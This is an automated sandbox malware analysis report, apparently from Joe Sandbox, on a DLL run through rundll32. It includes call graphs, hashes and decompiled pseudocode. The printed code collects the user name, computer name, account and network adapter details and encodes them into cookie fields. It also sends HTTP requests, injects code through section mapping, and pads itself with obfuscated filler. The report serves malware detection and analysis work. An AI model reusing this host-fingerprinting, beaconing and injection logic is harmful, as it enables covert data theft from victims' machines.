18000112f wsprintfW 6613->6621 6614->6615 6619 180001135 6614->6619 6615->6613 6616 180001131 6615->6616 6617 18000116b 6616->6617 6616->6619 6620 180001170 GetProcessHeap HeapFree 6617->6620 6617->6621 6622 18000111a RtlAllocateHeap 6618->6622 6623 18000110c HeapReAlloc 6618->6623 6619->6621 6624 180001153 GetProcessHeap HeapFree 6619->6624 6620->6621 6625 180001904 6621->6625 6622->6613 6623->6613 6624->6621 6626 18000192d LoadLibraryA GetProcAddress 6625->6626 6627 18000199a wsprintfW wsprintfW 6626->6627 6630 180001953 6626->6630 6628 1800019da wsprintfW 6627->6628 6662 180001bd4 6628->6662 6630->6627 6632 18000195e wsprintfW wsprintfW 6630->6632 6632->6628 6666 180002c88 6633->6666 6637 180002062 6636->6637 6673 1800014b4 6637->6673 6640 1800020a1 6641 1800014b4 6 API calls 6640->6641 6642 1800020be 6641->6642 6643 1800014b4 6 API calls 6642->6643 6644 1800020d4 6643->6644 6679 180001c28 GetComputerNameExW 6644->6679 6647 180002144 wsprintfW 6649 180002142 6647->6649 6648 1800020ff wsprintfW 6650 18000213d 6648->6650 6652 18000133c LoadLibraryA GetProcAddress 6649->6652 6650->6649 6651 180002117 wsprintfW 6650->6651 6651->6650 6653 180001388 GetAdaptersInfo 6652->6653 6660 1800013df 6652->6660 6654 180001396 6653->6654 6653->6660 6655 18000139f GetProcessHeap HeapAlloc 6654->6655 6654->6660 6656 1800013bd GetAdaptersInfo 6655->6656 6655->6660 6657 1800013cb GetProcessHeap HeapFree 6656->6657 6658 180001414 6656->6658 6657->6660 6659 18000145f GetProcessHeap HeapFree 6658->6659 6659->6660 6660->6580 6661->6570 6663 180001bea LoadLibraryA GetProcAddress 6662->6663 6664 1800019ff wsprintfW 6663->6664 6665 180001c0e GetNativeSystemInfo 6663->6665 6664->6574 6665->6664 6667 180002cb5 6666->6667 6670 180002ac0 6667->6670 6671 180002adb SwitchToThread SwitchToThread 6670->6671 6671->6671 6672 1800027cb wsprintfW wsprintfW wsprintfW wsprintfW 6671->6672 6672->6576 6674 1800014d7 6673->6674 6689 180001604 lstrlenW 6674->6689 6677 18000154c GetProcessHeap HeapFree 6678 180001560 GetUserNameW 6677->6678 6678->6640 6680 180001d68 6679->6680 6681 180001c60 LookupAccountNameW 6679->6681 6680->6647 6680->6648 6681->6680 6682 180001c96 GetLastError 6681->6682 6682->6680 6683 180001ca5 6682->6683 6683->6680 6684 180001cb0 GetProcessHeap HeapAlloc 6683->6684 6684->6680 6685 180001cd6 LookupAccountNameW 6684->6685 6686 180001d54 GetProcessHeap HeapFree 6685->6686 6688 180001d08 GetProcessHeap HeapFree 6685->6688 6686->6680 6688->6680 6690 1800014f9 6689->6690 6691 180001627 GetProcessHeap HeapAlloc 6689->6691 6690->6677 6690->6678 6691->6690 6692 180001647 WideCharToMultiByte 6691->6692 6692->6690 6702 1800024fc WinHttpOpen 6693->6702 6697 18000178e 6696->6697 6699 1800018de 6696->6699 6698 180001801 GetProcessHeap HeapAlloc 6697->6698 6697->6699 6700 180001827 6697->6700 6698->6699 6698->6700 6699->6582 6700->6699 6701 1800018ca GetProcessHeap HeapFree 6700->6701 6701->6699 6703 180002556 6702->6703 6704 180001b54 6702->6704 6705 180002574 WinHttpConnect 6703->6705 6706 180002568 WinHttpSetStatusCallback 6703->6706 6704->6582 6707 180002594 WinHttpOpenRequest 6705->6707 6708 180002790 WinHttpCloseHandle 6705->6708 6706->6705 6709 180002787 WinHttpCloseHandle 6707->6709 6710 1800025e8 6707->6710 6708->6704 6709->6708 6711 18000260b WinHttpSendRequest 6710->6711 6712 1800025ed WinHttpSetOption 6710->6712 6713 18000277e WinHttpCloseHandle 6711->6713 6714 18000263f WinHttpReceiveResponse 6711->6714 6712->6711 6713->6709 6714->6713 6715 180002652 WinHttpQueryHeaders WinHttpQueryHeaders 6714->6715 6716 1800026b6 WinHttpQueryDataAvailable 6715->6716 6717 180002734 6716->6717 6718 1800026ca 6716->6718 6719 180002760 6717->6719 6721 18000274c GetProcessHeap HeapFree 6717->6721 6718->6716 6718->6717 6720 1800026d7 GetProcessHeap 6718->6720 6724 18000270f WinHttpReadData 6718->6724 6719->6713 6722 1800026fc HeapAlloc 6720->6722 6723 1800026ee HeapReAlloc 6720->6723 6721->6719 6722->6718 6723->6718 6724->6717 6724->6718 6726 1800016e1 6 API calls 6725->6726 6727 1800016da 6725->6727 6747 180002a18 CreateFileA 6726->6747 6727->6726 6731 180001042 lstrcatA 6730->6731 6732 180001038 6730->6732 6733 180001061 6731->6733 6732->6731 6734 180002a18 CreateFileA 6733->6734 6735 1800011e9 6734->6735 6736 180002a5b WriteFile CloseHandle 6734->6736 6735->6598 6735->6599 6736->6735 6750 180001f2c lstrcpyA SHGetFolderPathA 6737->6750 6740 180002311 GetProcessHeap HeapAlloc 6741 180002338 6740->6741 6745 1800023f3 6740->6745 6742 180002415 6741->6742 6743 1800023d5 6741->6743 6756 180002b5c VirtualAlloc 6742->6756 6743->6745 6746 1800023df GetProcessHeap HeapFree 6743->6746 6745->6601 6746->6745 6748 1800011c7 6747->6748 6749 180002a5b WriteFile CloseHandle 6747->6749 6748->6594 6748->6595 6749->6748 6751 180001f95 lstrcatA 6750->6751 6752 180001f86 lstrcpyA 6750->6752 6753 180001fa2 lstrcatA lstrcpyA 6751->6753 6752->6753 6754 180001ff6 6753->6754 6755 180001fe0 lstrcpyA 6753->6755 6754->6740 6754->6741 6754->6745 6755->6754 6757 180002b95 GetLastError 6756->6757 6758 180002baa 6756->6758 6759 180002c00 6757->6759 6758->6759 6767 180001e64 6758->6767 6759->6745 6762 180002c16 GetLastError 6762->6759 6763 180002c28 6764 180002c56 6763->6764 6765 180002c2d VirtualProtect 6763->6765 6764->6759 6766 180002c63 GetLastError 6764->6766 6765->6764 6765->6765 6766->6759 6769 180001f08 6767->6769 6770 180001e8a 6767->6770 6768 180001e97 LoadLibraryA 6768->6769 6768->6770 6769->6762 6769->6763 6770->6768 6770->6769 6771 180001ed0 GetProcAddress 6770->6771 6771->6769 6771->6770 6799 7fef74d5ff9 6800 7fef74d6173 6799->6800 6801 7fef74d620e NtCreateSection 6800->6801 6802 7fef74d621e 6800->6802 6805 7fef74d616d 6800->6805 6801->6802 6803 7fef74d66a7 NtMapViewOfSection 6802->6803 6804 7fef74d66d4 6802->6804 6803->6802 6793 7fef74d5fe6 6794 7fef74d5fdd 6793->6794 6795 7fef74d5fed 6793->6795 6796 7fef74d620e NtCreateSection 6795->6796 6797 7fef74d621e 6795->6797 6796->6797 6797->6794 6798 7fef74d66a7 NtMapViewOfSection 6797->6798 6798->6797 6772 180001b08 6773 1800024fc 19 API calls 6772->6773 6774 180001b54 6773->6774 6775 180001318 6776 180001329 6775->6776 6777 180001332 ExitProcess 6776->6777 6778 18000131e SleepEx 6776->6778 6778->6776 6779 7fef74d2cf7 6780 7fef74d2cda CryptCreateHash 6779->6780 6781 7fef74d2d01 CryptAcquireContextW 6779->6781 6783 7fef74d2faa 6780->6783 6781->6783 6783->6783 6784 18000244c 6785 180002474 6784->6785 6786 180002455 CreateThread 6784->6786 6786->6785 6787 7fef74d6271 6788 7fef74d623f 6787->6788 6788->6787 6789 7fef74d620e NtCreateSection 6788->6789 6792 7fef74d621e 6788->6792 6789->6792 6790 7fef74d66a7 NtMapViewOfSection 6790->6792 6791 7fef74d66d4 6792->6790 6792->6791

                                                  Executed Functions

                                                  Function 00000001800024FC Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 198memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Http$Heap$CloseHandleQuery$AllocDataHeadersOpenProcessRequest$AvailableCallbackConnectFreeOptionReadReceiveResponseSendStatus
                                                  • String ID: GET$POST
                                                  • API String ID: 1614834629-3192705859
                                                  • Opcode ID: 4b22a6a2d3247f66cd39c864717bf5e5cc05fe6dbe070548806b85aa6a32ad93
                                                  • Instruction ID: f84e999ab61f2fbba52d9160ce5dc28e4838b3332290d6c6070ea75f8e9928f1
                                                  • Opcode Fuzzy Hash: 4b22a6a2d3247f66cd39c864717bf5e5cc05fe6dbe070548806b85aa6a32ad93
                                                  • Instruction Fuzzy Hash: A881A972304B8987EBA6CF66E800BD937A5FB4CBD4F448129AE0957B54DF38C698C704
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 000000018000133C Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 87memorylibraryloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 22%
                                                  			E0000000118000133C(long long __rbx, void* __rcx, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* __rdi;
				void* _t16;
				void* _t19;
				long long* _t34;
				void* _t48;
				long long* _t54;
				long long* _t56;
				void* _t62;
				void* _t63;
				struct HINSTANCE__* _t64;
				CHAR* _t67;

				_t34 = _t56;
				 *((long long*)(_t34 + 8)) = __rbx;
				 *((long long*)(_t34 + 0x18)) = __rbp;
				 *((long long*)(_t34 + 0x20)) = __rsi;
				 *(_t34 + 0x10) =  *(_t34 + 0x10) & 0;
				LoadLibraryA(_t67); // executed
				GetProcAddress(_t64);
				_t54 = _t34;
				if (_t34 == 0) goto 0x800013df;
				_t16 =  *_t54(); // executed
				if (_t16 != 0x6f) goto 0x800013df;
				if (__rbx == 0) goto 0x800013df;
				GetProcessHeap();
				HeapAlloc(??, ??, ??);
				if (_t34 == 0) goto 0x800013df;
				_t19 =  *_t54(); // executed
				if (_t19 == 0) goto 0x80001414;
				GetProcessHeap();
				HeapFree(??, ??, ??);
				r9d = 1;
				return E00000001180001578(0, _t34, __rbx, __rcx, L"; _gid=", _t34, 0x800070bc, _t62, _t63, _t48);
			}














                                                  0x18000133c
                                                  0x18000133f
                                                  0x180001343
                                                  0x180001347
                                                  0x180001367
                                                  0x18000136a
                                                  0x18000137a
                                                  0x180001380
                                                  0x180001386
                                                  0x18000138f
                                                  0x180001394
                                                  0x18000139d
                                                  0x18000139f
                                                  0x1800013af
                                                  0x1800013bb
                                                  0x1800013c5
                                                  0x1800013c9
                                                  0x1800013cb
                                                  0x1800013d9
                                                  0x1800013df
                                                  0x180001413

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$Process$AdaptersFreeInfo$AddressAllocLibraryLoadProc
                                                  • String ID: ; _gid=$GetAdaptersInfo$IPHLPAPI.DLL
                                                  • API String ID: 3866128989-336904856
                                                  • Opcode ID: 7598de9b6775fabc65e146ea8b68a20f653f2bb1abdfd2dc1ec96b8558cd00fe
                                                  • Instruction ID: b75e3b5367209cd78c64b13d950b78932923334006a58f125620b5977970df53
                                                  • Opcode Fuzzy Hash: 7598de9b6775fabc65e146ea8b68a20f653f2bb1abdfd2dc1ec96b8558cd00fe
                                                  • Instruction Fuzzy Hash: 55317872600B88DAEB96DB22F4443D973A1AB4DBC5F48C025EA0D0A765DF38C64EC300
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 000000018000108C Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 77memorylibrarynativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$Process$Free$AddressAllocAllocateInformationLibraryLoadProcQuerySystem
                                                  • String ID: NTDLL.DLL$ZwQuerySystemInformation
                                                  • API String ID: 2948972359-2445179936
                                                  • Opcode ID: 4b7823a0472f10f71a3871ae1883ce576c12e5eff67ca52907e33789a440dd5d
                                                  • Instruction ID: c553ab603bbb7ea155e402bcf953277eb51bc389a09fd2bd74e1016edb044849
                                                  • Opcode Fuzzy Hash: 4b7823a0472f10f71a3871ae1883ce576c12e5eff67ca52907e33789a440dd5d
                                                  • Instruction Fuzzy Hash: 5B313E72715A89C6FADADB56A8043D972A1AB4CBC2F48C034FB0957754EF3CCA4D8705
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0000000180002018 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 81COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 44%
                                                  			E00000001180002018(void* __eax, long long __rbx, void* __rcx, signed int __rdx, long long __rdi, long long __rsi) {
				void* __rbp;
				int _t34;
				void* _t37;
				signed long long _t49;
				signed long long _t52;
				void* _t83;
				WCHAR* _t85;
				void* _t86;
				signed long long _t88;
				void* _t89;
				WCHAR* _t98;
				WCHAR* _t100;

				_t49 = _t88;
				 *((long long*)(_t49 + 0x10)) = __rbx;
				 *((long long*)(_t49 + 0x18)) = __rsi;
				 *((long long*)(_t49 + 0x20)) = __rdi;
				_t86 = _t49 - 0x168;
				_t89 = _t88 - 0x250;
				 *((intOrPtr*)(_t86 + 0x170)) = 0x100;
				_t83 = __rcx;
				__imp__GetComputerNameExW(); // executed
				if (__eax != 0) goto 0x8000206a;
				 *((intOrPtr*)(_t89 + 0x40)) = 0x78;
				E000000011800014B4(_t49, __rbx, __rcx, L"; _u=", __rcx, _t86, _t89 + 0x40);
				 *((intOrPtr*)(_t86 + 0x170)) = 0x100;
				_t52 = _t49; // executed
				_t34 = GetUserNameW(_t100); // executed
				if (_t34 != 0) goto 0x800020a9;
				 *((intOrPtr*)(_t89 + 0x40)) = 0x78;
				E000000011800014B4(_t49, _t52, _t83 + _t52 * 2, ":", _t83, _t86, _t89 + 0x40);
				_t53 = _t52 + _t49;
				_t37 = E00000001180001C28(E000000011800014B4(_t49, _t52 + _t49, _t83 + (_t52 + _t49) * 2, ":", _t83, _t86, __rdx), 5, _t53 + _t49, _t89 + 0x20);
				r14d = _t37;
				if (_t37 == 0) goto 0x80002144;
				r9d =  *((intOrPtr*)(_t89 + 0x20));
				wsprintfW(_t98);
				goto 0x8000213d;
				r9d =  *((intOrPtr*)(_t89 + 0x20 + __rdx * 4));
				wsprintfW(_t85);
				if (__rdx + 1 - _t98 < 0) goto 0x80002117;
				goto 0x80002153;
				r9d = 0;
				return wsprintfW(??, ??);
			}















                                                  0x180002018
                                                  0x18000201b
                                                  0x18000201f
                                                  0x180002023
                                                  0x18000202c
                                                  0x180002033
                                                  0x18000203d
                                                  0x180002047
                                                  0x180002058
                                                  0x180002060
                                                  0x180002062
                                                  0x180002079
                                                  0x180002085
                                                  0x180002094
                                                  0x180002097
                                                  0x18000209f
                                                  0x1800020a1
                                                  0x1800020b9
                                                  0x1800020be
                                                  0x1800020e1
                                                  0x1800020e6
                                                  0x1800020fd
                                                  0x1800020ff
                                                  0x180002104
                                                  0x180002115
                                                  0x180002117
                                                  0x18000212e
                                                  0x180002140
                                                  0x180002142
                                                  0x180002144
                                                  0x180002172

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wsprintf$Name$ComputerUser
                                                  • String ID: %s%u$; __io=$; _u=$x
                                                  • API String ID: 4095488650-3513353778
                                                  • Opcode ID: f1478dc860690c2674d3b930d555615b59b4ecc490b00cfe724bc35653b41c2f
                                                  • Instruction ID: 7d741998cccdb29629df25af753f6537b3149e73fb9b8afa304b05458abafeeb
                                                  • Opcode Fuzzy Hash: f1478dc860690c2674d3b930d555615b59b4ecc490b00cfe724bc35653b41c2f
                                                  • Instruction Fuzzy Hash: A73149B2704A8992EBA2CB11E8443D97370F75C7C5F948126EA4D5B665EF3CC60EC740
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0000000180001C28 Relevance: 15.1, APIs: 10, Instructions: 93memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$NameProcess$AccountFreeLookup$AllocComputerErrorLast
                                                  • String ID:
                                                  • API String ID: 2409119217-0
                                                  • Opcode ID: a34f698e1f708103aaef8de00ac60e6572fcc8d6c95b913e3dba122220aa4ed4
                                                  • Instruction ID: bccd91b441821ca56803e91b7d04f4d1ec65d623121010ca1dafda4b918fcf64
                                                  • Opcode Fuzzy Hash: a34f698e1f708103aaef8de00ac60e6572fcc8d6c95b913e3dba122220aa4ed4
                                                  • Instruction Fuzzy Hash: 06315E72701B498AEB62DF74E4443D933E5EB4DBC9F548026EA4D56A58EF38C60CC340
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0000000180002174 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 56%
                                                  			E00000001180002174(void* __eax, void* __eflags, signed int __rax, signed int __rbx, signed int __rcx, signed int __rdx, long long __rdi, void* __rsi, void* __r11, void* __r14) {
				void* __rbp;
				void* _t27;
				signed long long _t51;
				void* _t72;
				long _t75;
				void* _t76;
				void* _t78;
				void* _t85;

				_t74 = __rsi;
				_t52 = __rbx;
				 *((long long*)(_t78 + 0x18)) = __rbx;
				 *((long long*)(_t78 + 0x20)) = __rdi;
				_t76 = _t78 - 0x57;
				_t4 = _t52 + 4; // 0x4
				asm("rdtsc");
				_t51 = __rax | __rdx << 0x00000020;
				_t54 = __rbx << 0x00000010 | __rcx;
				SleepEx(_t75); // executed
				_t72 = __rdi - 1;
				if (__eflags != 0) goto 0x80002190;
				wsprintfW(??, ??);
				E00000001180002428(_t76 - 0x29, __rbx << 0x00000010 | __rcx);
				_t9 = _t72 + 1; // 0x4
				E00000001180002860( *((intOrPtr*)(_t76 + 0x17)), _t9, _t4, _t51, __rbx << 0x00000010 | __rcx, __rsi, _t76, _t76 - 0x69, _t85);
				if (_t51 == 0) goto 0x8000224e;
				if (E00000001180001D80(_t9, _t51, _t51, _t54, _t76 + 0x1b, _t51, _t74, _t76, _t76 + 0x67, _t76 + 0x6f, __r11, __r14) == 0) goto 0x8000224e;
				if ( *((intOrPtr*)(_t76 + 0x6f)) - 0x400 < 0) goto 0x8000224e;
				_t27 = E00000001180001198(_t9,  *((intOrPtr*)(_t76 + 0x67)),  *((intOrPtr*)(_t76 + 0x6f)), _t76 + 0x67);
				if ( *((intOrPtr*)(_t76 + 0x67)) == 0) goto 0x80002232;
				GetProcessHeap();
				HeapFree(??, ??, ??);
				E00000001180001B5C(_t27, _t51,  *((intOrPtr*)(_t76 + 0x67)), _t76 - 0x69, _t74);
				if (_t51 == 0) goto 0x8000224e;
				E00000001180002480(_t51, _t76 + 0x1b, _t51);
				return 0;
			}











                                                  0x180002174
                                                  0x180002174
                                                  0x180002174
                                                  0x180002179
                                                  0x18000217f
                                                  0x18000218d
                                                  0x180002194
                                                  0x18000219a
                                                  0x1800021a0
                                                  0x1800021a8
                                                  0x1800021ae
                                                  0x1800021b2
                                                  0x1800021c2
                                                  0x1800021cc
                                                  0x1800021d8
                                                  0x1800021db
                                                  0x1800021e3
                                                  0x1800021fb
                                                  0x180002208
                                                  0x18000220e
                                                  0x18000221c
                                                  0x18000221e
                                                  0x18000222c
                                                  0x180002238
                                                  0x180002240
                                                  0x180002249
                                                  0x180002264

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$FreeProcessSleepwsprintf
                                                  • String ID: %016IX
                                                  • API String ID: 2187706517-1811457740
                                                  • Opcode ID: 22af208baba866085d29c64b7848b84a41cee80f8a0e70526e1cf0428296f31c
                                                  • Instruction ID: 661cb7bdf0d2a5cc3032a3c802704869fbd6bc5f67ca47283b56c7d180ea033d
                                                  • Opcode Fuzzy Hash: 22af208baba866085d29c64b7848b84a41cee80f8a0e70526e1cf0428296f31c
                                                  • Instruction Fuzzy Hash: E9214F72300A499AEB92DFA1D9543DD33A6E7487C4F888425BE0D6B699EE38D64CC350
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 000007FEF74D5FF9 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50nativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 147 7fef74d5ff9-7fef74d600f 148 7fef74d61b7-7fef74d61cc 147->148 149 7fef74d61e1-7fef74d61f7 148->149 150 7fef74d61ce-7fef74d61d7 148->150 151 7fef74d61fd-7fef74d620c 149->151 152 7fef74d6173-7fef74d6188 149->152 153 7fef74d666d 150->153 157 7fef74d624b-7fef74d625b 151->157 158 7fef74d620e-7fef74d6215 NtCreateSection 151->158 154 7fef74d618a-7fef74d6192 152->154 155 7fef74d619f-7fef74d61aa 152->155 159 7fef74d6681 153->159 162 7fef74d616d-7fef74d6171 154->162 163 7fef74d6194-7fef74d619a 154->163 155->148 160 7fef74d625d-7fef74d626f 157->160 161 7fef74d621e-7fef74d622d 157->161 158->161 164 7fef74d6685-7fef74d668a 159->164 166 7fef74d622f-7fef74d623a 160->166 161->160 161->166 162->150 163->164 165 7fef74d6691-7fef74d6696 163->165 169 7fef74d668c 164->169 170 7fef74d6672 164->170 167 7fef74d6698-7fef74d66a0 165->167 168 7fef74d6677-7fef74d667c 165->168 171 7fef74d66c5-7fef74d66d2 166->171 167->164 168->159 174 7fef74d676a-7fef74d6777 call 7fef74d7947 168->174 169->169 170->159 172 7fef74d66a7-7fef74d66bb NtMapViewOfSection 171->172 173 7fef74d66d4-7fef74d66db 171->173 172->171 178 7fef74d6779-7fef74d6789 174->178 179 7fef74d6740-7fef74d6750 174->179 185 7fef74d66f2-7fef74d671d 178->185 181 7fef74d6752-7fef74d6759 179->181 182 7fef74d6731-7fef74d673e call 7fef74d7947 179->182 181->153 182->179 188 7fef74d671f-7fef74d672f 182->188 185->178 185->188 188->182 189 7fef74d675e-7fef74d6768 call 7fef74d7947 188->189 189->174 189->185
                                                  C-Code - Quality: 100%
                                                  			E000007FE7FEF74D5FF9(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __rdx, void* __r10, void* __r11, void* __r15, signed int _a80, intOrPtr _a308, intOrPtr _a312, intOrPtr _a316, intOrPtr _a320, intOrPtr _a324, intOrPtr _a328, intOrPtr _a332, intOrPtr _a336, intOrPtr _a340, intOrPtr _a344) {
				intOrPtr _t40;
				void* _t57;

				_a344 = 0x18f;
				_a344 = _a344 + 0xff;
				_a324 = 0x1d29;
				_a324 = _a324 + 0x3c;
				if (__ecx == __ecx) goto 0xf74d6042;
				_a336 = 0x7b;
				_a336 = _a336;
				if (__edx == __edx) goto 0xf74d608a;
				_a328 = 6;
				_a328 = _a328 + 0x27;
				if (__ebx == __ebx) goto 0xf74d6059;
				_a332 = 0x35;
				_a332 = _a332 + 0x17;
				if (__eax == __eax) goto 0xf74d602b;
				_a312 = 0x19cc;
				_a312 = _a312 + 0xa0;
				if (__ebx == __ebx) goto 0xf74d60a5;
				_a340 = 0xd9;
				_a340 = _a340 + 0x81;
				goto E000007FE7FEF74D5FF9;
				_a316 = 0x5c;
				_a316 = _a316 + 0x8f;
				if (__ecx == __ecx) goto 0xf74d60d7;
				_a308 = 7;
				_a308 = _a308 + 0x12;
				if (__ecx == __ecx) goto 0xf74d6070;
				_a320 = 0x24b;
				_a320 = _a320 + 0x30;
				if (__edx == __edx) goto L1;
				_t40 =  *((intOrPtr*)(_t57 + 0x70 + _a80 * 4));
				if (_t40 - 0x1f4 <= 0) goto 0xf74d60f2;
				return _t40;
			}





                                                  0x7fef74d5ff9
                                                  0x7fef74d6004
                                                  0x7fef74d6014
                                                  0x7fef74d601f
                                                  0x7fef74d6029
                                                  0x7fef74d602b
                                                  0x7fef74d6036
                                                  0x7fef74d6040
                                                  0x7fef74d6042
                                                  0x7fef74d604d
                                                  0x7fef74d6057
                                                  0x7fef74d6059
                                                  0x7fef74d6064
                                                  0x7fef74d606e
                                                  0x7fef74d6070
                                                  0x7fef74d607b
                                                  0x7fef74d6088
                                                  0x7fef74d608a
                                                  0x7fef74d6095
                                                  0x7fef74d60a0
                                                  0x7fef74d60a5
                                                  0x7fef74d60b0
                                                  0x7fef74d60be
                                                  0x7fef74d60c0
                                                  0x7fef74d60cb
                                                  0x7fef74d60d5
                                                  0x7fef74d60d7
                                                  0x7fef74d60e2
                                                  0x7fef74d60ec
                                                  0x7fef74d60f7
                                                  0x7fef74d6105
                                                  0x7fef74d611b

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946754973.000007FEF74D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000007FEF74D0000, based on PE: true
                                                  • Associated: 00000005.00000002.946750732.000007FEF74D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.946799509.000007FEF7529000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7fef74d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CreateSection
                                                  • String ID: $$'$<
                                                  • API String ID: 2449625523-1052150772
                                                  • Opcode ID: a827bfe900c49c1c2808823daf063abfa26f5a14f1beb8bf1ce44c1864846899
                                                  • Instruction ID: 8932e8488b6f6d80a9fa20072dfc919a9c347f9019337c7e8c012e66ea0445a5
                                                  • Opcode Fuzzy Hash: a827bfe900c49c1c2808823daf063abfa26f5a14f1beb8bf1ce44c1864846899
                                                  • Instruction Fuzzy Hash: 2021E976C1C2C2CBE6B08F54A4483BFB7E1E385394F600539A2CA469A9D7BDE4449F02
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 000007FEF74D5FE6 Relevance: 3.0, APIs: 2, Instructions: 40nativeCOMMON
